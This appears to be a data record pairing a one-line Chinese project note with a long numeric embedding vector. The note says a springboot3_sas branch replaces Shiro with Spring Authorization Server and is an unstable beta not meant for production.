springboot3_sas分支采用 `Spring Authorization Server` 替换 `Shiro`,目前是beta版不稳定,生产项目不要使用; --- end body ---
1,835
[ -0.015312327072024345, -0.002654056763276458, 0.008264176547527313, 0.02828860469162464, 0.0312486682087183, -0.00365007808431983, -0.025248540565371513, 0.05865725502371788, -0.0009575204458087683, 0.02289648912847042, 0.001994042657315731, 0.02238447777926922, 0.030720656737685204, 0.018352393060922623, 0.02748858742415905, 0.013912297785282135, -0.04144088551402092, 0.00383208179846406, -0.010520224459469318, -0.00789616908878088, -0.03296070545911789, -0.005208111368119717, 0.011408244259655476, 0.0401928573846817, -0.015256325714290142, 0.027056578546762466, -0.0027360585518181324, 0.02268848568201065, -0.03865682706236839, -0.02624056115746498, 0.019168410450220108, 0.008576183579862118, -0.00011737750901374966, 0.003972084727138281, -0.0021620462648570538, 0.01662435568869114, 0.013352285139262676, 0.020416436716914177, -0.03347271680831909, -0.01155224721878767, -0.0190564077347517, -0.020272433757781982, -0.02699257619678974, 0.010104215703904629, -0.014712314121425152, 0.0013090280117467046, 0.005536118522286415, -0.023536503314971924, -0.010648227296769619, 0.007308156229555607, 0.03651278093457222, 0.006976149044930935, 0.011576247401535511, -0.03433673456311226, -0.002780059352517128, -0.025888552889227867, 0.04566497728228569, 0.0008005170966498554, -0.033824723213911057, 0.00010556475899647921, 0.001270027132704854, -0.044640954583883286, -0.007444159127771854, 0.010312220081686974, -0.03721679374575615, 0.0684814602136612, -0.022176474332809448, 0.0247685294598341, 0.01305627916008234, 0.011648248881101608, 0.00797217059880495, 0.0011680249590426683, 0.06310535222291946, 0.009328199550509453, 0.01238426472991705, -0.0399368554353714, 0.011592247523367405, -0.010472224093973637, -0.02518453821539879, 0.017360370606184006, -0.016944361850619316, 0.012856274843215942, -0.034944746643304825, -0.0025580546353012323, 0.03024064563214779, 0.028000598773360252, -0.03600076958537102, -0.08627384155988693, -0.0008590183570049703, 0.008028171956539154, -0.006220133043825626, -0.003710079239681363, -0.013264283537864685, -0.044800955802202225, 0.009064193814992905, 0.008912190794944763, -0.006520139519125223, 0.010048214346170425, -0.02732858434319496, -0.005344114266335964, -0.0036860788241028786, 0.03012864477932453, -0.012176260352134705, -0.02920062467455864, 0.026064557954669, 0.0237285066395998, 0.03513675183057785, 0.0017870381707325578, 0.025152537971735, 0.07808166742324829, 0.016320349648594856, -0.007172153331339359, -0.019744422286748886, -0.023296497762203217, -0.010800231248140335, 0.01579233817756176, -0.02707257866859436, -0.015784338116645813, 0.017952384427189827, 0.020272433757781982, -0.006512138992547989, -0.043680932372808456, -0.025328541174530983, -0.05017707124352455, -0.053281139582395554, 0.010136216878890991, -0.008148173801600933, 0.014464309439063072, -0.004048086702823639, -0.013208282180130482, 0.014608312398195267, -0.003044065088033676, -0.014032299630343914, -0.015160324051976204, 0.027920596301555634, -0.04422494396567345, 0.0021700463257730007, 0.028544610366225243, -0.008344178088009357, -0.037248797714710236, -0.022336477413773537, -0.056705210357904434, -0.0013870296534150839, -0.0044240946881473064, -0.002812060061842203, 0.019200410693883896, 0.03436873480677605, 0.0035080749075859785, -0.024096515029668808, -0.014784315600991249, -0.055617187172174454, 0.012088258750736713, 0.03814481571316719, 0.04339292645454407, 0.05718522146344185, -0.03230468928813934, 0.006016128696501255, 0.015096322633326054, 0.039872851222753525, -0.03192068263888359, 0.005524117965251207, -0.02172846533358097, 0.014128302223980427, 0.0038480821531265974, 0.010704228654503822, -0.0344967357814312, -0.0017760379705578089, -0.005016107112169266, -0.032608695328235626, 0.027600590139627457, -0.011944254860281944, 0.0017320370534434915, 0.027424586936831474, 0.027920596301555634, -0.040416862815618515, -0.008736186660826206, 0.021584460511803627, 0.0018360392423346639, -0.0035060748923569918, -0.000593512668274343, 0.012304263189435005, 0.01366429217159748, 0.018848402425646782, -0.0003630077699199319, 0.027840595692396164, -0.04608098417520523, -0.014064300805330276, -0.05142509937286377, -0.022240474820137024, -0.021504459902644157, 0.008184175007045269, 0.012088258750736713, 0.03308870643377304, -0.04454495385289192, -0.006276133935898542, -0.0030180644243955612, -0.0497930645942688, -0.02585655264556408, 0.010720228776335716, 0.007880168035626411, 0.0062601338140666485, -0.005752122960984707, -0.02001642808318138, 0.015384328551590443, -0.0020840445067733526, -0.004172089044004679, 0.013088279403746128, -0.022416479885578156, -0.013656292110681534, -0.028400607407093048, -0.020160431042313576, -0.01592034101486206, 0.009696207009255886, -0.02852861024439335, -0.036320775747299194, 0.006256133783608675, -0.002408051397651434, 0.021664462983608246, -0.01360029075294733, 0.008496182039380074, 0.009264198131859303, -0.04422494396567345, 0.0017930383328348398, 0.021536460146307945, -0.05728122591972351, -0.006164131686091423, -0.0005530118360184133, 0.008424179628491402, -0.01564033515751362, -0.005476117134094238, 0.015704335644841194, -0.005532118026167154, -0.0031500672921538353, 0.006324135232716799, 0.040800873190164566, -0.006320135202258825, 0.0008000170928426087, -0.016272347420454025, -0.01251226756721735, 0.020352434366941452, 0.01395229808986187, 0.04988906532526016, -0.021248454228043556, -0.013848296366631985, 0.011200238950550556, 0.029392627999186516, 0.010120216757059097, 0.03078465722501278, -0.030528653413057327, -0.03750480338931084, -0.01662435568869114, 0.0005675121210515499, -0.01708836480975151, -0.024160515516996384, 0.015400329604744911, -0.023488502949476242, 0.018784401938319206, -0.002772059291601181, 0.0186723992228508, -0.0003650078142527491, 0.022752486169338226, 0.02059243991971016, -0.06374536454677582, 0.016864361241459846, 0.03568076342344284, -0.059425272047519684, -0.027856595814228058, 0.028400607407093048, -0.009240197949111462, 0.005444116424769163, 0.06348935514688492, -0.013104280456900597, -0.0376008041203022, 0.0342407301068306, -0.007372157648205757, -0.006840146146714687, 0.015032321214675903, 0.03756880387663841, 0.007032150402665138, -0.013936297968029976, 0.002846060786396265, 0.024752529338002205, 0.030144644901156425, -0.03000064194202423, 0.023248497396707535, -0.002446052385494113, 0.023280497640371323, -0.030320648103952408, 0.009968212805688381, 0.038752827793359756, -0.02790459617972374, -0.00772816501557827, -0.023664506152272224, 0.0036720784846693277, 0.04713700711727142, 0.013400286436080933, -0.016720358282327652, 0.03308870643377304, 0.022800486534833908, 0.012648270465433598, -0.00879218801856041, -0.02126445434987545, 0.013736293651163578, 0.009088193997740746, -0.04688100144267082, 0.027712592855095863, 0.025392543524503708, -0.013168281875550747, -0.006624141708016396, -0.019520416855812073, 0.051201093941926956, -0.004740101285278797, -0.022000471130013466, -0.02088044583797455, -0.013064279220998287, 0.027712592855095863, 0.01942441612482071, 0.012000256218016148, -0.04240090772509575, -0.017392370849847794, -0.03881682828068733, 0.018112387508153915, -0.07251355051994324, 0.013816295191645622, 0.06656142324209213, 0.007380157709121704, -0.06028928980231285, -0.00019637920195236802, -0.017200367525219917, 0.013984299264848232, 0.027440587058663368, -0.028096601366996765, -0.008280176669359207, -0.00024388021847698838, -0.01872039958834648, -0.021200453862547874, 0.0011770251439884305, 0.012536267749965191, 0.009616205468773842, -0.02390451170504093, -0.028096601366996765, 0.015632333233952522, -0.018704399466514587, 0.016912361606955528, 0.011696250177919865, -0.020656442269682884, 0.0020580440759658813, 0.015416329726576805, 0.04358493164181709, -0.009032192640006542, 0.000962520600296557, 0.002202047035098076, 0.02292848937213421, -0.024160515516996384, 0.006128130946308374, -0.018064385280013084, -0.030064642429351807, -0.028768615797162056, 0.014784315600991249, 0.05222511664032936, -0.0016280347481369972, -0.028896616771817207, 0.03900883346796036, 0.04240090772509575, 0.052449122071266174, 0.004980106372386217, -0.01447230949997902, -0.03016064502298832, -0.01796838454902172, -0.029440628364682198, -0.020112430676817894, 0.009664206765592098, -0.0342407301068306, 0.03427273407578468, -0.023792508989572525, -0.0006285134586505592, -0.037664804607629776, 0.0047961026430130005, -0.03625677525997162, 0.025120537728071213, 0.011704250238835812, -0.028752613812685013, 0.000430509215220809, -0.0022640484385192394, 0.04966505989432335, 0.002016043057665229, 0.009368199855089188, 0.010872232727706432, -0.01491231843829155, -0.04867304116487503, -0.027760593220591545, 0.01968041993677616, -0.017520373687148094, -0.05801723897457123, -0.02824060432612896, 0.0011980256531387568, -0.015152323991060257, -0.0086241839453578, 0.017600376158952713, -0.04678500071167946, 0.011784251779317856, 0.043968938291072845, 0.02795259840786457, 0.020400436595082283, -0.005228111520409584, -0.025088535621762276, -0.006936148274689913, 0.0017110365442931652, 0.026880575343966484, 0.018032385036349297, 0.007164153270423412, -0.015432329848408699, -0.0042320904321968555, 0.027888596057891846, 0.04620898887515068, 0.04038486257195473, 0.021792465820908546, 0.005300113465636969, -0.016640355810523033, -0.013880296610295773, -0.00497210631147027, -0.007288155611604452, -0.010112215764820576, 0.03062465414404869, -0.004828103352338076, 0.003550075925886631, 0.0007440159097313881, 0.03136067092418671, 0.032400693744421005, 0.0247685294598341, -0.03179267793893814, -0.03257669508457184, 0.04051286727190018, 0.003544075647369027, -0.011600247584283352, -0.0008115173550322652, 0.03379272297024727, -0.0313766710460186, 0.01900840550661087, 0.0054001156240701675, 0.006032128818333149, 0.01929641328752041, 0.039712850004434586, -0.006664142478257418, -0.03673678636550903, -0.023696506395936012, -0.05027307569980621, -0.029520630836486816, -0.007964170537889004, -0.004860104061663151, -0.010992234572768211, 0.022992491722106934, -0.032608695328235626, -0.03153667226433754, -0.020272433757781982, 0.008592183701694012, -0.00473210122436285, 0.020272433757781982, 0.04675300046801567, -0.02001642808318138, 0.00671614333987236, 0.010680228471755981, -0.039168838411569595, -0.008600183762609959, -0.0156883355230093, 0.01755237579345703, 0.0011990256607532501, -0.008544182404875755, 0.0017470374004915357, -0.02886461652815342, 0.018736399710178375, 0.00413608830422163, 0.06912147998809814, 0.02419251762330532, -0.01809638738632202, 0.0064841387793421745, -0.04617698863148689, -0.03539275750517845, 0.010152217000722885, 0.03792081028223038, -0.03772880509495735, -0.013464287854731083, 0.03542475774884224, 0.040256861597299576, -0.033568717539310455, -0.009696207009255886, 0.032224688678979874, 0.0023620505817234516, 0.005664120893925428, 0.015096322633326054, 0.029728636145591736, -0.007144152652472258, -0.03756880387663841, -0.00155903329141438, 0.017488373443484306, -0.048225030303001404, -0.0023060492239892483, 0.013744293712079525, 0.01942441612482071, 0.018784401938319206, 0.024288518354296684, -0.013176281936466694, -0.016384350135922432, 0.01755237579345703, 0.011832253076136112, 0.003870082786306739, -0.03744079917669296, 0.051201093941926956, -0.015248325653374195, -0.005448116455227137, -0.010720228776335716, -0.032112687826156616, -0.0342407301068306, -0.020960448309779167, -0.005896125920116901, -0.020736442878842354, -0.004940105602145195, -0.011112237349152565, 0.04844903573393822, 0.012144259177148342, -0.015200325287878513, -0.017280369997024536, -0.03062465414404869, 0.0006045129266567528, 0.015424329787492752, 0.000796517007984221, 0.025504544377326965, -0.0013020278420299292, 0.016384350135922432, -0.03166467696428299, -0.0368327870965004, 0.009592205286026001, 0.011608248576521873, 0.043840937316417694, -0.032736700028181076, 0.024496523663401604, -0.020672442391514778, 0.013752293772995472, -0.0015630334382876754, -0.03230468928813934, -0.010704228654503822, 0.04102487862110138, -0.004792102612555027, 0.013520289212465286, -0.03529675304889679, 0.009184196591377258, -0.019872425124049187, -0.014168302528560162, 0.020656442269682884, 0.003692078869789839, 0.008744186721742153, -0.030208645388484, 0.020480437204241753, 0.0051841107197105885, 0.0015320327365770936, -0.03596876934170723, -0.017408372834324837, 0.004448094870895147, 0.0010235218796879053, 0.015088322572410107, 0.0025140538346022367, -0.008216175250709057, 0.020704442635178566, -0.019952425733208656, 0.01136024296283722, -0.017024364322423935, -0.026496566832065582, 0.013560289517045021, -0.034112729132175446, -0.01833639107644558, 0.0021420458797365427, 0.014416308142244816, 0.005056107882410288, -0.007700164802372456, -0.0032560694962739944, 0.012768273241817951, 0.040416862815618515, 0.003630077699199319, 0.005300113465636969, -0.014888318255543709, 0.046272989362478256, 0.004652099218219519, 0.004352093208581209, -0.009720208123326302, -0.03220868855714798, 0.02740858495235443, 0.001851039589382708, -0.004636099096387625, -0.015432329848408699, -0.004144088365137577, -0.0040260860696434975, -0.03075265698134899, -0.012400264851748943, -0.0013430287363007665, 0.0344967357814312, -0.019280411303043365, -0.011232240125536919, 0.018864402547478676, 0.01942441612482071, 0.00009287698776461184, 0.010928233154118061, 0.009184196591377258, 0.01552033144980669, -0.010624227114021778, -0.011528246104717255, 0.02915262244641781, 0.04195289686322212, 0.014200303703546524, -0.0071041518822312355, 0.010168217122554779, 0.006564140319824219, 0.014824316836893559, 0.02953663095831871, -0.0188004020601511, -0.030016642063856125, -0.02523253858089447, -0.012328263372182846, 0.028720613569021225, 0.013208282180130482, 0.027504587545990944, 0.0059961280785501, -0.03929683938622475, 0.02640056423842907, -0.009136195294559002, -0.0016640356043353677, 0.042880915105342865, 0.007900169119238853, -0.006276133935898542, 0.0033140708692371845, -0.020128430798649788, -0.06054529547691345, -0.000819517532363534, -0.035776764154434204, -0.02302449196577072, 0.011312241666018963, 0.020416436716914177, 0.05200111120939255, 0.0017200367292389274, -0.014424308203160763, -0.01688036136329174, -0.02748858742415905, 0.0017280369065701962, -0.027376584708690643, 0.020496437326073647, -0.027600590139627457, -0.0012910276418551803, -0.009648206643760204, 0.022336477413773537, 0.020944448187947273, -0.010576225817203522, -0.009704207070171833, -0.00694414833560586, -0.01203225739300251, 0.027184581384062767, 0.01745637319982052, -0.02523253858089447, -0.005008107051253319, 0.01675235852599144, -0.00782016757875681, -0.015304327011108398, -0.03539275750517845, -0.023616503924131393, -0.015720335766673088, 0.0035480759106576443, 0.03363271802663803, 0.015336328186094761, 0.007864167913794518, 0.024464523419737816, 0.02380850911140442, 0.04732901230454445, 0.030944662168622017, -0.025616547092795372, 0.010864232666790485, 0.008616183884441853, -0.013104280456900597, -0.020896445959806442, 0.004636099096387625, -0.04022486135363579, 0.012552267871797085, -0.016240347176790237, -0.01424830500036478, 0.000483510346384719, 0.005144109949469566, 0.000962520600296557, -0.032192688435316086, 0.009472202509641647, -0.02352050319314003, -0.007788166403770447, 0.018736399710178375, -0.01295227650552988, 0.005296113435178995, 0.0073281568475067616, 0.04595298320055008, -0.0012180260382592678, 0.006196132395416498, -0.01055222563445568, 0.021296454593539238, -0.016848359256982803, -0.02025643363595009, -0.008256176486611366, -0.03140867128968239, -0.03104066289961338, -0.03347271680831909, -0.013856296427547932, 0.010352221317589283, 0.02310449443757534, -0.00004340717714512721, 0.01817638799548149, 0.02774459309875965, 0.009480202570557594, 0.014272305183112621, -0.003058065427467227, -0.01196825597435236, 0.012184260413050652, -0.027552589774131775, 0.009496202692389488, -0.022752486169338226, -0.008456180803477764, -0.055041175335645676, -0.002718058181926608, -0.03660878166556358, -0.016272347420454025, -0.0298246368765831, -0.010456223040819168, -0.02932862751185894, -0.011392243206501007, 0.02865661308169365, 0.004532096907496452, -0.0006670142756775022, 0.0013010278344154358, -0.017312370240688324, 0.013200282119214535, -0.018832402303814888, 0.027040578424930573, -0.011880254372954369, 0.028720613569021225, 0.010744229890406132, 0.0044800955802202225, -0.017408372834324837, -0.0034660741221159697, -0.013064279220998287, 0.024576526135206223, 0.01216026023030281, -0.004596098326146603, 0.00012737771612592041, -0.011856253258883953, -0.035616762936115265, 0.025936555117368698, -0.02356850355863571, 0.00017412872693967074, 0.007396158296614885, 0.00005112609142088331, 0.008888189680874348, -0.012632270343601704, -0.014632312580943108, -0.006156131625175476, 0.01654435321688652, 0.024448523297905922, -0.0008170174551196396, -0.0014060300309211016, 0.010272219777107239, 0.018400393426418304, -0.010352221317589283, -0.005904125981032848, 0.025632547214627266, -0.01103223580867052, 0.04032086208462715, -0.0012260262155905366, -0.0046961004845798016, 0.009560204111039639, -0.007052150554955006, 0.026080558076500893, -0.026592567563056946, 0.012632270343601704, -0.012912276200950146, -0.018208390101790428, -0.006512138992547989, -0.0037000791635364294, -0.037664804607629776, 0.029920639470219612, -0.016072344034910202, -0.014824316836893559, -0.01125624030828476, 0.01240826491266489, 0.02844860777258873, -0.022832488641142845, -0.013560289517045021, -0.01216026023030281, 0.028624610975384712, 0.002534054219722748, -0.014152302406728268, -0.00275805895216763, 0.042880915105342865, -0.01662435568869114, 0.018992405384778976, -0.019824422895908356, -0.01340828649699688, -0.01357629057019949, 0.017984384670853615, -0.007208154071122408, 0.01424830500036478, 0.011504245921969414, -0.003796081058681011, 0.028272604569792747, -0.014360306784510612, 0.0044240946881473064, 0.005752122960984707, -0.000799517089035362, -0.04323292523622513, 0.04467295482754707, -0.00011662749602692202, -0.0031280668918043375, -0.03065665438771248, 0.030880659818649292, 0.013312284834682941, -0.013552289456129074, -0.017344370484352112, 0.013272283598780632, -0.0011000235099345446, -0.0003635077737271786, 0.009864211082458496, 0.023216497153043747, 0.021088451147079468, -0.04934505373239517, 0.03232068940997124, -0.014072300866246223, 0.028096601366996765, 0.019360413774847984, -0.009440201334655285, -0.01745637319982052, -0.005684121511876583, -0.025712549686431885, -0.04489696025848389, 0.0014520310796797276, -0.03596876934170723, 0.01988842524588108, 0.003310070838779211, 0.019376413896679878, -0.007040150463581085, 0.0070201498456299305, -0.03182468190789223, -0.007912169210612774, -0.026048555970191956, -0.004620098974555731, -0.01796838454902172, 0.016400350257754326, -0.005592119414359331, -0.01597634144127369, 0.05475316941738129, -0.004168089013546705, 0.0014270305400714278, 0.038368821144104004, 0.0013880296610295773, 0.012656270526349545, -0.004592098295688629, 0.005192110780626535, -0.013360285200178623, 0.031472671777009964, 0.014424308203160763, -0.015280326828360558, -0.001633034902624786, -0.020784445106983185, 0.00473210122436285, 0.013088279403746128, 0.011120237410068512, 0.01758437603712082, -0.006368136033415794, -0.04816102981567383, -0.0041840896010398865, 0.004356093239039183, -0.025120537728071213, -0.023744506761431694, 0.0005610120133496821, 0.027472587302327156, -0.016040343791246414, 0.003932083956897259, 0.0029020621441304684, 0.02448052354156971, -0.007036150433123112, -0.027520587667822838, -0.030736656859517097, 0.013768293894827366, -0.0474570132791996, -0.023040492087602615, 0.016976362094283104, -0.006156131625175476, 0.003284070175141096, -0.028928618878126144, 0.0017280369065701962, -0.0037540802732110023, -0.0021100451704114676, -0.00683214608579874, -0.008800188079476357, -0.021792465820908546, 0.008672185242176056, 0.015672335401177406, 0.02268848568201065, -0.044928960502147675, -0.048865046352148056, 0.010128216817975044, -0.009536203928291798, 0.012224261648952961, -0.009408201090991497, 0.0037080792244523764, 0.010376221500337124, -0.006096130236983299, 0.0329287052154541, 0.01532832719385624, 0.012352264486253262, 0.025616547092795372, 0.007324156351387501, 0.021360456943511963, -0.04131288453936577, -0.050689082592725754, -0.018704399466514587, 0.010312220081686974, -0.034400735050439835, 0.019408414140343666, 0.034528739750385284, 0.014952319674193859, -0.00700814975425601, -0.010072215460240841, -0.023120494559407234, 0.01766437664628029, 0.0239845123142004, -0.007176153361797333, -0.006240133196115494, 0.019376413896679878, -0.0381128154695034, 0.013896296732127666, -0.0014600312570109963, -0.0019100408535450697, -0.013416286557912827, -0.014784315600991249, 0.01144824456423521, -0.02209647186100483, -0.06112130731344223, 0.006116130854934454, 0.04182489216327667, -0.017472373321652412, 0.028080599382519722, 0.006684143096208572, 0.011704250238835812, -0.00030850659823045135, 0.00981620978564024, 0.01148824580013752, 0.021456459537148476, 0.015464330092072487, -0.029600633308291435, -0.014584311284124851, -0.036992792040109634, -0.0071961539797484875, -0.00682014599442482, -0.04169689118862152, 0.010120216757059097, 0.023280497640371323, -0.02748858742415905, 0.0030960661824792624, -0.02844860777258873, 0.003218068741261959, 0.007228154689073563, 0.01562433410435915, -0.027600590139627457, -0.011880254372954369, 0.02251248061656952, 0.045184966176748276, -0.0054081156849861145, 0.032608695328235626, -0.0018040385330095887, -0.010304220020771027, 0.0024960534647107124, -0.016032341867685318, -0.010672228410840034, -0.017024364322423935, -0.012672270648181438, -0.0030400650575757027, -0.0060201287269592285, -0.022672483697533607, -0.04790502414107323, -0.027040578424930573, 0.020832445472478867, -0.01292827632278204, 0.02118445374071598, -0.010984234511852264, -0.017152367159724236, -0.053121134638786316, 0.032896704971790314, 0.007172153331339359, -0.025552546605467796, 0.035744763910770416, 0.029808636754751205, -0.0028700614348053932, 0.01838439330458641, -0.013520289212465286, 0.03868882730603218, 0.007084151264280081, 0.03459274023771286, 0.007756165694445372, -0.016344349831342697, -0.014888318255543709, -0.009072193875908852, 0.010696228593587875, -0.0005850124871358275, 0.010456223040819168, 0.008944191038608551, 0.024640526622533798, 0.037664804607629776, 0.014672313816845417, 0.007220154162496328, -0.012128259055316448, -0.04092887416481972, 0.0036340777296572924, 0.02206447161734104, 0.003072065766900778, 0.008408179506659508, 0.025328541174530983, 0.019520416855812073, 0.006436137482523918, 0.013736293651163578, 0.03044865094125271, -0.010432222858071327, -0.0022760487627238035, 0.0064001367427408695, -0.017728378996253014, 0.013648292049765587, 0.012760273180902004, -0.032560694962739944, 0.005792123731225729, 0.01552033144980669, 0.008044172078371048, -0.015512331388890743, 0.010064215399324894, -0.008084172382950783, -0.028848616406321526, 0.017776379361748695, -0.03395272418856621, 0.0019360414007678628, -0.033824723213911057, -0.0077081648632884026, 0.0014880318194627762, 0.052577123045921326, 0.007268155459314585, -0.014608312398195267, -0.0058721257373690605, -0.020160431042313576, 0.013200282119214535, 0.005828124471008778, 0.0056961216032505035, 0.013896296732127666, -0.012680270709097385, 0.01595234125852585, -0.016608355566859245, 0.023712506517767906, -0.004644099157303572, -0.008448180742561817, -0.0130322789773345, -0.010888232849538326, -0.02017643116414547, 0.008704186417162418, 0.016912361606955528, -0.013336285017430782, -0.009344199672341347, -0.011976256035268307, -0.013608290813863277, -0.008408179506659508, -0.012560268864035606, 0.0034880745224654675, 0.006208132486790419, 0.02025643363595009, 0.011632248759269714, 0.007644163444638252, -0.006720143835991621, 0.0013290283968672156, 0.012736272066831589, 0.0036340777296572924, -0.00014387807459570467, -0.005636120680719614, 0.00936019979417324, -0.015992341563105583, -0.02828860469162464, -0.016344349831342697, -0.011336241848766804, -0.0099202124401927, 0.033152706921100616, -0.014048300683498383, 0.0005975127569399774, -0.01071222871541977, -0.028928618878126144, 0.004392093978822231, -0.010064215399324894, -0.013136280700564384, -0.007200154010206461, -0.05104109272360802, -0.0050361077301204205, 0.0015700336080044508, -0.02388850972056389, 0.027120579034090042, 0.008192175067961216, 0.019024407491087914, 0.0040180860087275505, -0.019104408100247383, -0.015472331084311008, -0.010576225817203522, 0.016928361728787422, -0.006136131007224321, 0.012240261770784855, -0.015072322450578213, 0.000043313426431268454, 0.013264283537864685, 0.006196132395416498, -0.008084172382950783, 0.007852167822420597, -0.009064193814992905, -0.002440052106976509, -0.008432180620729923, 0.006600141059607267, -0.0031880680471658707, 0.003670078469440341, 0.011296241544187069, 0.012632270343601704, 0.001244026585482061, -0.0050761085003614426, -0.02648056671023369, -0.0011810252908617258, -0.0013430287363007665, -0.020656442269682884, 0.002082044491544366, 0.003964084666222334, 0.018848402425646782, 0.019184410572052002, -0.008744186721742153, 0.027840595692396164, 0.008968192152678967, 0.010040214285254478, 0.020736442878842354, -0.004368093330413103, -0.0185443963855505, 0.009600205346941948, -0.0005940126720815897, 0.030352648347616196, 0.012584269046783447, -0.0048441034741699696, -0.01800038479268551, 0.0020720441825687885, 0.006972149014472961, -0.018976405262947083, 0.0007690164493396878, -0.00837617926299572, -0.0020960448309779167, 0.0008715186268091202, -0.009088193997740746, 0.008368179202079773, -0.012520267628133297, -0.021776465699076653, -0.006660142447799444, -0.015000320971012115, -0.029136622324585915, -0.0011960255214944482, 0.0028240603860467672, 0.008696185424923897, -0.007024150341749191, -0.0059361266903579235, 0.03012864477932453, 0.0002082544524455443, -0.010576225817203522, 0.010344221256673336, 0.026880575343966484, 0.009448202326893806, -0.01436830684542656, -0.006876146886497736, 0.008216175250709057, 0.023536503314971924, -0.011216240003705025, -0.014448308385908604, -0.01196825597435236, -0.0018530396046116948, -0.025968555361032486, 0.007932169362902641, -0.004924105480313301, -0.017440373077988625, -0.00412408821284771, 0.0041000875644385815, 0.06211332604289055, 0.0015150323743000627, -0.037952810525894165, 0.0016660356195643544, 0.001576033653691411, -0.0077161649242043495, 0.0016010341932997108, 0.004078087396919727, -0.016560353338718414, 0.023664506152272224, -0.003996085375547409, 0.012688270770013332, 0.0002687557425815612, -0.031120665371418, -0.022208474576473236, 0.0047121006064116955, 0.033152706921100616, -0.0017140366835519671, -0.006984149105846882, 0.0017100365366786718, 0.008528182283043861, 0.02915262244641781, 0.015568332746624947, 0.04073686897754669, -0.0019630419556051493, -0.006188132334500551, -0.00628813449293375, 0.006176132243126631, -0.013720293529331684, -0.03654478117823601, -0.0013080280041322112, -0.014360306784510612, 0.01584833860397339, -0.004120088182389736, -0.04617698863148689, -0.0237285066395998, 0.010784230194985867, -0.031120665371418, -0.01988842524588108, -0.0027160581666976213, 0.03232068940997124, 0.009592205286026001, -0.010240218602120876, 0.0296966340392828, -0.0075761619955301285, 0.029424628242850304, 0.029264625161886215, -0.018352393060922623, 0.027472587302327156, 0.01633634977042675, -0.008912190794944763, 0.012104258872568607, 0.008576183579862118, -0.0009700207156129181, 0.0076681640930473804, -0.03091266006231308, 0.042752914130687714, 0.0014920318499207497, 0.00748815992847085, 0.029680633917450905, -0.0071961539797484875, 0.005180110689252615, 0.016720358282327652, 0.025424543768167496, 0.02080044522881508, 0.0058801257982850075, -0.03376072272658348, -0.021616462618112564, 0.0035460758954286575, 0.021616462618112564, -0.014712314121425152, -0.009672206826508045, -0.00019875424914062023, -0.04265691339969635, 0.012976277619600296, -0.004452095367014408, 0.026064557954669, 0.009656206704676151, 0.0014220303855836391, 0.02176046557724476, 0.020160431042313576, 0.006072129588574171, -0.04528096690773964, -0.01846439391374588, -0.01366429217159748, 0.018032385036349297, 0.01809638738632202, -0.008288176730275154, -0.0037540802732110023, 0.028896616771817207, 0.000420508993556723, 0.004504096228629351, 0.025456544011831284, 0.03179267793893814, -0.005144109949469566, 0.004296091850847006, -0.006776144728064537, -0.010000213980674744, -0.010584225878119469, 0.0149763198569417, -0.04307292029261589, -0.006824146024882793, -0.00904819369316101, -0.03750480338931084, 0.007688164245337248, 0.0029340626206249, 0.007116151973605156, -0.005256112199276686, -0.025152537971735, 0.006656142417341471, -0.003544075647369027, -0.002692057518288493, -0.006560140289366245, -0.007676164153963327, 0.007520160637795925, -0.007172153331339359, 0.012728272005915642, 0.012296263128519058, 0.0022960491478443146, 0.0041000875644385815, -0.049153052270412445, 0.01382429525256157, 0.00234004994854331, 0.008464180864393711, -0.005444116424769163, 0.01851239614188671, -0.005608120001852512, -0.00033800723031163216, 0.002376050688326359, 0.023920511826872826, 0.0019270412158221006, 0.010016214102506638, -0.01704036444425583, -0.003132066922262311, -0.008352178148925304, 0.03246469423174858, -0.0004062586813233793, -0.004444094840437174, 0.0035020748618990183, 0.004022086039185524, 0.016528353095054626, 0.023136494681239128, 0.005280112847685814, 0.0014650312950834632, 0.030864659696817398, -0.03158467635512352, -0.0009560204343870282, 0.005656120833009481, 0.010536225512623787, 0.004400094039738178, 0.015032321214675903, 0.01251226756721735, -0.015232325531542301, 0.017984384670853615, -0.006264133844524622, -0.0064841387793421745, -0.020864445716142654, -0.0035280755255371332, 0.005336114205420017, 0.004148088861256838, -0.00040675868513062596, 0.007108151912689209, 0.005456116516143084, -0.0022060470655560493, 0.024000512436032295, -0.01716836728155613, -0.017472373321652412, 0.005428115837275982, -0.018208390101790428, -0.013720293529331684, -0.014592312276363373, -0.028384607285261154, 0.007280155550688505, 0.021952468901872635, -0.036704786121845245, 0.011304241605103016, -0.015608333982527256, 0.010024214163422585, 0.008832188323140144, -0.019984427839517593, 0.014240304008126259, 0.0055561186745762825, 0.009080193936824799, -0.014888318255543709, -0.009016192518174648, -0.035904768854379654, -0.0021160452160984278, 0.03280070051550865, -0.013144280761480331, -0.028016598895192146, 0.004552097525447607, 0.0156883355230093, -0.03096066229045391, -0.014456309378147125, 0.002880061510950327, 0.025920553132891655, -0.012120258994400501, -0.0054641165770590305, -0.028080599382519722, -0.007028150372207165, 0.012664270587265491, -0.0034540737979114056, -0.017808381468057632, 0.0035320755559951067, 0.012560268864035606, -0.011168238706886768, 0.00981620978564024, -0.013048279099166393, 0.009032192640006542, -0.03721679374575615, 0.010224218480288982, -0.008952191099524498, 0.016512352973222733, 0.0028640611562877893, -0.0031040662433952093, 0.0175043735653162, -0.0018300390802323818, -0.004840103443711996, 0.010640227235853672, 0.0066481418907642365, -0.0012460266007110476, 0.011520246043801308, -0.016688356176018715, -0.024752529338002205, 0.02548854425549507, -0.010272219777107239, -0.010368221439421177, -0.03542475774884224, 0.004448094870895147, -0.01792038232088089, 0.00258005503565073, -0.0009310198947787285, 0.016784358769655228, -0.03096066229045391, 0.003210068680346012, 0.006428137421607971, 0.0014830316649749875, -0.023408500477671623, 0.023952512070536613, 0.0045720976777374744, -0.015656335279345512, 0.012784273363649845, -0.013088279403746128, -0.01875240169465542, 0.020672442391514778, 0.020496437326073647, -0.005180110689252615, -0.0001526282576378435, -0.005864125210791826, -0.004006085451692343, -0.00025588046992197633, -0.03011264279484749, -0.003124066861346364, -0.021200453862547874, 0.01784038171172142, -0.027392584830522537, 0.030640654265880585, -0.0030080643482506275, -0.0094642024487257, 0.026160558685660362, -0.005612120032310486, -0.02230447717010975, -0.009712208062410355, -0.0030360647942870855, -0.02419251762330532, -0.008224176242947578, 0.002312049502506852, -0.019648419693112373, 0.009352199733257294, 0.005728122312575579, 0.011168238706886768, -0.011776251718401909, 0.013872296549379826, -0.0007220154511742294, -0.015120322816073895, 0.0038920831866562366, -0.010224218480288982, 0.00020962947746738791, 0.00383208179846406, 0.015104322694242, -0.005824124440550804, -0.009888211265206337, 0.017152367159724236, 0.011568247340619564, 0.032272689044475555, -0.029360627755522728, 0.00048576039262115955, 0.002234047744423151, -0.007928169332444668, 0.021088451147079468, -0.0368327870965004, 0.006248133722692728, 